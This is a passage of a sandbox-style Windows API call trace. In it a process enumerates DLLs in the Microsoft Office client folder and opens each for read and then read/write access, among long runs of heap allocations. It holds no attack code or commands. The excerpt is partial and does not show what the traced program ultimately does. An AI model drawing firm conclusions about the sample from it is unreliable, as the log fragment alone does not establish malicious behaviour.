dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0099.858] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d2c0 | out: hHeap=0x20000) returned 1 [0099.858] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d160 [0099.858] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d108 | out: hHeap=0x20000) returned 1 [0099.858] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d210 [0099.858] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d160 | out: hHeap=0x20000) returned 1 [0099.858] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d210 | out: hHeap=0x20000) returned 1 [0099.858] AreFileApisANSI () returned 1 [0099.858] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cea0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 79 [0099.858] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9e) returned 0x8c5a8 [0099.858] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cea0, cbMultiByte=-1, lpWideCharStr=0x8c5a8, cchWideChar=79 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-string-l1-1-0.dll") returned 79 [0099.858] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-string-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-crt-string-l1-1-0.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd0eaf4e3, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd0eaf4e3, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd10c55e8, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x60c0)) returned 1 [0099.858] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c5a8 | out: hHeap=0x20000) returned 1 [0099.858] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0099.858] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0099.858] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cea0 | out: hHeap=0x20000) returned 1 [0099.858] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.858] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.858] FindNextFileW (in: hFindFile=0x786d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd0dca676, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd0dca676, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd0f9426a, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x52c0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="api-ms-win-crt-time-l1-1-0.dll", cAlternateFileName="AP5E4C~1.DLL")) returned 1 [0099.858] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0099.858] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e308 [0099.858] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0099.858] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69030 [0099.858] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e308 | out: hHeap=0x20000) returned 1 [0099.858] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0099.858] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0099.858] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0099.858] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0099.858] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0099.858] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69030 | out: hHeap=0x20000) returned 1 [0099.858] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0099.858] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0099.858] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35170 [0099.858] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0099.858] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35170 | out: hHeap=0x20000) returned 1 [0099.858] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0099.858] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ff0 [0099.859] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0099.859] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ff0 | out: hHeap=0x20000) returned 1 [0099.859] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0099.859] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b00 [0099.859] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0099.859] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c848 [0099.859] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0099.859] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0099.859] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8d220 [0099.859] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c848 | out: hHeap=0x20000) returned 1 [0099.859] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.859] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.859] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.859] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.859] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d220 | out: hHeap=0x20000) returned 1 [0099.859] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0099.859] AreFileApisANSI () returned 1 [0099.859] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-time-l1-1-0.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-time-l1-1-0.dll", lpUsedDefaultChar=0x0) returned 77 [0099.859] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6ce48 [0099.859] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.859] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.859] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0099.907] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0099.949] AreFileApisANSI () returned 1 [0099.949] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 77 [0099.949] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9a) returned 0x8cd88 [0099.949] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x8cd88, cchWideChar=77 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-time-l1-1-0.dll") returned 77 [0099.949] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-time-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-crt-time-l1-1-0.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0099.949] GetFileType (hFile=0x368) returned 0x1 [0099.949] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8cd88 | out: hHeap=0x20000) returned 1 [0099.950] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0099.950] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0099.950] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0099.950] CloseHandle (hObject=0x368) returned 1 [0099.950] AreFileApisANSI () returned 1 [0099.950] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 77 [0099.950] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9a) returned 0x8c998 [0099.950] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x8c998, cchWideChar=77 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-time-l1-1-0.dll") returned 77 [0099.950] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-time-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-crt-time-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0099.951] GetFileType (hFile=0x368) returned 0x1 [0099.951] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c998 | out: hHeap=0x20000) returned 1 [0099.951] CloseHandle (hObject=0x368) returned 1 [0099.951] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0099.951] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0099.951] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0099.951] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0099.951] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0099.951] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0099.951] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0099.951] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0099.951] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0099.951] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0099.951] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e110 [0099.951] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0099.951] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0099.951] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0099.951] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0099.951] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e110 | out: hHeap=0x20000) returned 1 [0099.951] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53760 [0099.951] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53520 [0099.951] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0099.951] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0099.951] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0099.951] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53520 | out: hHeap=0x20000) returned 1 [0099.951] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53760 | out: hHeap=0x20000) returned 1 [0099.951] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0099.951] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0099.951] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0099.951] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0099.951] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0099.952] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0099.952] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0099.952] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0099.952] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53400 [0099.952] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0099.952] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0099.952] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53400 | out: hHeap=0x20000) returned 1 [0099.952] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0099.952] AreFileApisANSI () returned 1 [0099.952] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 77 [0099.952] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9a) returned 0x8c458 [0099.952] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x8c458, cchWideChar=77 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-time-l1-1-0.dll") returned 77 [0099.952] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-time-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-crt-time-l1-1-0.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd0dca676, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd0dca676, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd0f9426a, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x52c0)) returned 1 [0099.952] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c458 | out: hHeap=0x20000) returned 1 [0099.952] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0099.952] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0099.952] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ce48 | out: hHeap=0x20000) returned 1 [0099.952] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.952] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.952] FindNextFileW (in: hFindFile=0x786d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd1b7fe91, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd1b7fe91, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd1ec71c8, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4ac0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="api-ms-win-crt-utility-l1-1-0.dll", cAlternateFileName="AP80F4~1.DLL")) returned 1 [0099.952] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0099.952] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0099.952] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0099.952] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68e50 [0099.952] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0099.952] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d000 [0099.952] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d420 [0099.952] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d790 [0099.952] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d420 | out: hHeap=0x20000) returned 1 [0099.952] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d000 | out: hHeap=0x20000) returned 1 [0099.952] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68e50 | out: hHeap=0x20000) returned 1 [0099.952] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d790 | out: hHeap=0x20000) returned 1 [0099.952] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0099.952] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350b0 [0099.953] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0099.953] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350b0 | out: hHeap=0x20000) returned 1 [0099.953] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0099.953] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0099.953] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0099.953] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f30 | out: hHeap=0x20000) returned 1 [0099.953] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d058 [0099.953] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0099.953] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cf50 [0099.953] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8ca40 [0099.953] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0099.953] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cf50 | out: hHeap=0x20000) returned 1 [0099.953] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8cce0 [0099.953] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ca40 | out: hHeap=0x20000) returned 1 [0099.953] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.953] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.953] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.953] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.953] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8cce0 | out: hHeap=0x20000) returned 1 [0099.953] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d058 | out: hHeap=0x20000) returned 1 [0099.953] AreFileApisANSI () returned 1 [0099.953] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-utility-l1-1-0.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-utility-l1-1-0.dll", lpUsedDefaultChar=0x0) returned 80 [0099.953] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d1b8 [0099.953] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.953] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.953] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0099.953] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0099.954] AreFileApisANSI () returned 1 [0099.954] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d1b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 80 [0099.954] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8cb90 [0099.954] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d1b8, cbMultiByte=-1, lpWideCharStr=0x8cb90, cchWideChar=80 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-utility-l1-1-0.dll") returned 80 [0099.954] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-utility-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-crt-utility-l1-1-0.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0099.959] GetFileType (hFile=0x368) returned 0x1 [0099.959] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8cb90 | out: hHeap=0x20000) returned 1 [0099.959] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0099.959] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0099.959] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0099.959] CloseHandle (hObject=0x368) returned 1 [0099.959] AreFileApisANSI () returned 1 [0099.959] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d1b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 80 [0099.959] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8d370 [0099.960] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d1b8, cbMultiByte=-1, lpWideCharStr=0x8d370, cchWideChar=80 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-utility-l1-1-0.dll") returned 80 [0099.960] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-utility-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-crt-utility-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0099.960] GetFileType (hFile=0x368) returned 0x1 [0099.960] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d370 | out: hHeap=0x20000) returned 1 [0099.960] CloseHandle (hObject=0x368) returned 1 [0099.960] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0099.960] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0099.960] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0099.960] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0099.960] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0099.960] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0099.960] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0099.960] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0099.960] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0099.960] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0099.960] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0099.960] HeapFree (in: hHeap=0x20000, 